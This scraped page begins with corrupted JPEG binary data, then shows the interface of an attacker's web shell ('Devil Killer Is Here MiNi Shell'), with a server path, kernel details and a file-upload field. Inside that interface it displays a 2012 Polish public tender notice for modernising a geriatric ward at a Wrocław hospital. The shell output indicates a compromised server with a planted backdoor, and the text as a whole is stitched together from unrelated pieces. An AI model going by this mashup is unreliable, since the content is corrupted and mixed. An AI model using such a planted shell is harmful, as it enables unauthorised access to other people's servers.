JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121123/469604-N-2012.html

<p class="kh_header"><b>Wrocław: Modernizacja Oddziału Chorób Wewnętrznych i Geriatrii oraz budynku dawnej apteki  w ramach zadania inwestycyjnego: Projekt utworzenia Centrum Geriatrii na terenie Szpitala Specjalistycznego im. A. Falkiewicza we Wrocławiu  - Modernizacja Oddziału Chorób Wewnętrznych i Geriatrii wraz z zakupem nowoczesnego sprzętu medycznego.</b><br>
<b>Numer ogłoszenia: 469604 - 2012; data zamieszczenia: 23.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. A. Falkiewicza , ul. Warszawska 2, 52-114 Wrocław, woj. dolnośląskie, tel. 071 3428631, faks 071 3465172.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.falkiewicza.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Oddziału Chorób Wewnętrznych i Geriatrii oraz budynku dawnej apteki  w ramach zadania inwestycyjnego: Projekt utworzenia Centrum Geriatrii na terenie Szpitala Specjalistycznego im. A. Falkiewicza we Wrocławiu  - Modernizacja Oddziału Chorób Wewnętrznych i Geriatrii wraz z zakupem nowoczesnego sprzętu medycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia stanowi wykonanie robót budowlanych w procesie modernizacji Oddziału Chorób Wewnętrznych i Geriatrii szpitala oraz budynku dawnej apteki w ramach zadania inwestycyjnego. Projekt utworzenia Centrum Geriatrii na terenie Szpitala Specjalistycznego im. A. Falkiewicza we Wrocławiu - Modernizacja Oddziału Chorób Wewnętrznych i Geriatrii wraz z zakupem nowoczesnego sprzętu medycznego. Prace remontowo - budowlane obejmą:
a)	istniejący budynek Oddziału Internistyczno- Geriatrycznego - ich zadaniem będzie  dostosowanie go do potrzeb utworzenia nowego Oddziału Geriatrycznego, oraz
b)	budynek dawnej apteki - ich celem  będzie dostosowanie go do funkcji Ośrodka Geriatrycznego świadczącego kompleksową opiekę nad człowiekiem starszym w zakresie usług medycznych i rehabilitacji. 
2.W ramach realizacji przedmiotu zamówienia należy wykonać następujące prace:
a)	Przebudowę budynków
Przebudowa obejmuje: wykonanie nowego układu ścianek działowych, rozebranie części istniejących ścianek działowych, wykonanie otworów drzwiowych w ścianach nośnych oraz poszerzenie istniejących otworów drzwiowych, dostosowanie budynku do przepisów pożarowych, wykonanie ścian oddzielenia pożarowego o odporności ogniowej EI120, wydzielenie pożarowo klatek schodowych ścianami o odporności ogniowej EI60, dodanie nowych okien oddymiających połaciowych, przebudowę zewnętrznych schodów, przebudowę wewnętrznych klatek schodowych, wykonanie wyłazów na dach, rozebranie fragmentu stropu i schodów budynku Ośrodka Geriatrycznego i wykonanie nowego układu w ich miejscu,  wykonanie pochylni dla niepełnosprawnych, zadaszenie nad wejściem do budynku Oddziału Internistyczno-Geriatrycznego poprzez zastosowanie typowej konstrukcji wsporczej.

b)  Roboty remontowe
Zakres robót remontowych obejmować będzie: wymianę posadzek wewnątrz budynków, wymianę posadzek na schodach zewnętrznych, wyprofilowanie wejść do budynku Ośrodka Geriatrycznego z kostek betonowych grubości 6cm z wykończeniem powierzchniowym antypoślizgowym, remont opaski wokół budynku, malowanie i licowanie ścian i sufitów,  kompletną wymianę stolarki drzwiowej, wymianę części okien również w zakresie ochrony pożarowej, wymianę istniejącego pokrycia dachowego Ośrodka Geriatrycznego na dachówkę  karpiówkę ceramiczną, w kolorze czerwonym, układaną pojedynczo, wymianę wszystkich obróbek blacharskich na nowe z  blachy cynkowo-tytanowej, wymianę wszystkich rynien i rur spustowych na nowe z blachy cynkowo-tytanowej, wymianę pokrycia dachowego Oddziału Internistyczno-Geriatrycznego z 2 warstw papy termozgrzewalnej, oczyszczenie i pomalowanie balustrad ochronnych na dachu, wymiana  istniejących wentylacji na dachu na nowe, wykonanie nowego pokrycia z papy o klasie ogniowej E30 w pasie 8m przylegającego budynku niższego (budynek kuchni), wymianę instalacji elektrycznej, wymianę instalacji sanitarnych, dostosowanie wentylacji w pomieszczeniach.

c) Instalacje elektryczne
Zakres robót  instalacji elektrycznych obejmuje :
-	główną rozdzielnicę RG-400/230V 
-	główne tablice rozdzielcze dla oddziału internistyczno - geriatrycznego  
-	główny wyłącznik prądu 
-	instalację siły i gniazd wtykowych  ogólnych
-	instalację siły i gniazd wtykowych  sieci komputerowej
-	instalację  sieci zasilającej IT dla intensywnej opieki medycznej
-	instalację oświetlenia ogólnego
-	instalację  oświetlenia nocnego
-	instalację oświetlenia awaryjnego
-	instalację wyrównania potencjału
-	instalację połączeń wyrównawczych
-	trasy kablowe dla potrzeb instalacji elektrycznych 
-	instalację ochrony przeciwporażeniowej
-	instalację ochrony przeciwprzepięciowej

Zakres projektu instalacje teletechniczne obejmuje :
-	instalację komputerową
-	instalację telefoniczną 
-	instalację telewizji szpitalnej
-	instalację oddymiania  klatek schodowych
-	instalację zamknięć ogniowych
-	instalacje systemu przyzywowego
-	trasy kablowe dla potrzeb instalacji teletechnicznych 

d) Instalacje sanitarne
Zakres robót obejmuje wykonanie robót demontażowych istniejących instalacji wod.-kan., c.o., wentylacji i wykonanie wewnętrznych instalacje wody zimnej i ciepłej, centralnego ogrzewania, kanalizacji sanitarnej, instalacji p-poż, gazów medycznych, wentylacji mechanicznej dla sali intensywnego dozoru i dla pomieszczeń endoskopii.

3. Szczegółowy zakres robót objętych przedmiotem zamówienia jest zgodny ze STWiOR, przedmiarem robót, projektem budowlanym i wykonawczym a także z obowiązującymi w tym zakresie przepisami, normami oraz zasadami wiedzy technicznej. W.w. dokumenty stanowią załączniki do niniejszej specyfikacji.
4. Wykonawca wykona niezbędne odbiory umożliwiające uzyskanie pozwolenia na użytkowanie kolejnych części (kondygnacji ) budynku. Dotyczy to robót budowlanych, elektrycznych i sanitarnych.
5. Całość inwestycji została podzielona na etapy określone w harmonogramie rzeczowo - terminowym stanowiącym załącznik do umowy w sprawie zamówienia publicznego. Każdy etap inwestycji będzie wymagał przedłożenia dokumentów niezbędnych do uzyskania pozwolenia na jego użytkowanie.
6. Zaleca się, aby wykonawca dokonał (na swój koszt) wizji lokalnej miejsc, w którym nastąpi realizacja przedmiotu zamówienia i ich otoczenia, a także zdobył, na swoją odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty, zawarcia umowy i wykonania zamówienia. Termin dokonania wizji lokalnej należy ustalić z kierownikiem Działu Technicznego (Marcin Gawron), nr tel. 71  37-74-120,  0 667-977-707 (w godzinach 8.00 - 15.00).
7. Prace budowlane będą się odbywać w  czasie pracy szpitala ( oddziału internistycznego) i muszą być prowadzone w sposób gwarantujący bezpieczeństwo osób przebywających w budynku i wokół niego, w przypadku budynku apteki obiekt jest wyłączony z eksploatacji. Wykonawca zabezpieczy obręb prowadzenia robót w sposób zapewniający bezpieczeństwo użytkowników obiektu (w tym pacjentów i personelu medycznego) a także osób postronnych.
8. Termin i czas wyłączenia energii elektrycznej jak również wody i c.o. na czas wykonywania koniecznych prac należy bezwzględnie każdorazowo ustalać z Kierownikiem Działu Technicznego Zamawiającego.
9. Dopuszcza  się   wykonywanie prac  od   poniedziałku  do  piątku  w  godz.  7.00 - 19.00  oraz  w  soboty w  godz. 9.00 - 14.00.
10. Wykonawca ponosi odpowiedzialność za przekazany przez Zamawiającego teren robót od momentu jego protokolarnego przejęcia do czasu odbioru końcowego, w szczególności ponosi pełną odpowiedzialności za  teren robót, zabezpieczenie przed uszkodzeniem, zniszczeniem  i  kradzieżą  urządzeń  i  obiektów  na  terenie  robót,  zabezpieczenie  przed  dostępem osób niepowołanych.
11. Wymagana gwarancja na wykonane roboty będzie wynosić 36 miesięcy licząc od dnia podpisania bez  zastrzeżeń protokołu końcowego odbioru robót.
12. Wykonawca doprowadzi  do  stanu  pierwotnego zajmowany w  czasie  trwania  prac teren wokół obiektu  i zajmowane pomieszczenia oraz uporządkuje terenu po zakończeniu robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.45.30.00-7, 45.40.00.00-1, 45.11.10.00-8, 45.11.12.00-0, 45.26.23.10-7, 45.26.23.00-4, 45.26.25.22-6, 45.22.31.00-7, 45.26.12.11-6, 45.26.00.00-0, 45.43.00.00-0, 45.44.21.00-8, 45.45.00.00-6, 45.41.00.00-4, 45.41.00.00-4, 45.42.11.00-5, 45.42.11.10-8, 45.32.00.00-6, 45.23.31.24-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest do wniesienia wadium. Kwota wadium wynosi 131 170,10 zł (słownie: sto trzydzieści jeden tysięcy sto siedemdziesiąt złotych 10/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w. za spełniony, jeśli Wykonawcy wykażą realizację co najmniej 2 (dwóch) robót budowlanych polegających na przebudowie, remoncie o łącznej wartości co najmniej 1 500.000 PLN/brutto każda,  odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia dla budynków użyteczności publicznej o kubaturze minimum 3000,00 m3 w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich rodzaju i  wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. protokoły odbiorów końcowych).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w. warunek za spełniony, jeśli Wykonawcy udokumentują dysponowanie:
1)	osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno -budowlanej bez ograniczeń, oraz
2)	osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjno-inżynieryjnej w zakresie instalacji sanitarnych,
3)	osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjno-inżynieryjnej w zakresie instalacji elektrycznych.
Osoby wymienione w punktach 1-3 muszą być wpisane na listę właściwej mu terytorialnie Okręgowej Izby Inżynierów Budownictwa, 
4)	osobą lub kilkoma osobami posiadającymi aktualne świadectwo kwalifikacyjne (w zakresie niezbędnym wynikającym z Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r.)  uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji w zakresie obsługi, konserwacji, montażu, kontrolno -pomiarowych, remontów dla urządzeń, instalacji i sieci :
- grupa 1 (elektryczne do 1 kV)-  eksploatacyjne (E) i dozorowe (D),
- grupa 2 (kotłowe) -  eksploatacyjne (E) i dozorowe (D),  
- grupa 3 (gazowe) - eksploatacyjne (E) i dozorowe (D),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w. warunek za spełniony, jeśli Wykonawcy złożą:
1) opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca  ubezpieczony jest od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 1 000 000 PLN.
2) informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy (na kwotę co najmniej 1 000 000 PLN), wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca (lub jego podwykonawca) zobowiązany jest do złożenia co najmniej 3 deklaracji zgodności z Dyrektywą Medyczną 93/42/ECC w zakresie wykonanych instalacji gazów medycznych z podaniem miejsca ich wbudowania.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje zmiany w umowie dotyczące przedmiotu zamówienia lub terminu realizacji umowy w następujących przypadkach:
a)	z powodu istotnych braków lub błędów dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa,
b)	z powodu wystąpienia dodatkowych robót budowlanych, a niemożliwych do przewidzenia przed zawarciem umowy dla obiektów, o którym mowa w § 1 ust. 1 niniejszej umowy.
c)	z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody o znacznych rozmiarach, mającej bezpośredni wpływ na terminowość wykonywania robót,
d)	z powodu działań osób trzecich uniemożliwiających wykonywanie robót budowlanych, które to działania nie są konsekwencją winy którejkolwiek ze stron,
e)	konieczności zmiany terminu wykonania lub odbioru robót spowodowanej podjęciem przez Zamawiającego decyzji o przeprowadzeniu przez osobę trzecią kontroli jakości i sposobu prowadzenia robot,
f)	zmiany obowiązujących przepisów prawa,
g)	uzasadnionych przyczyn technicznych lub funkcjonalnych powodujących konieczność zmiany sposobu wykonania umowy,
h)	wynikających ze specyfiki działalności Zamawiającego potrzeb w zakresie zmiany terminu wykonania lub odbioru robót,
i)	z powodu zmian sposobu finansowania zamówienia ze środków finansowych  przyznanych Zamawiającemu na sfinansowanie wykonania robót; o zmianie w tym zakresie Zamawiający niezwłocznie powiadomi Wykonawcę.
j)	jeżeli zmiana jest korzystna dla Zamawiającego. 
2. Nie stanowi istotnej zmiany umowy w rozumieniu art. 144 ust. 1 ustawy Prawo zamówień publicznych:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana 
nr rachunku bankowego),
b)	zmiana danych teleadresowych, 
c)	zmiana osób wskazanych do kontaktów między stronami.
Wyżej wskazane zmiany zostaną wprowadzone w postaci aneksu do umowy w sprawie zamówienia publicznego w przypadku zaistnienia zdarzeń wymienionych w pkt. 20.3. SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.falkiewicza.internetdsl.pl<br>
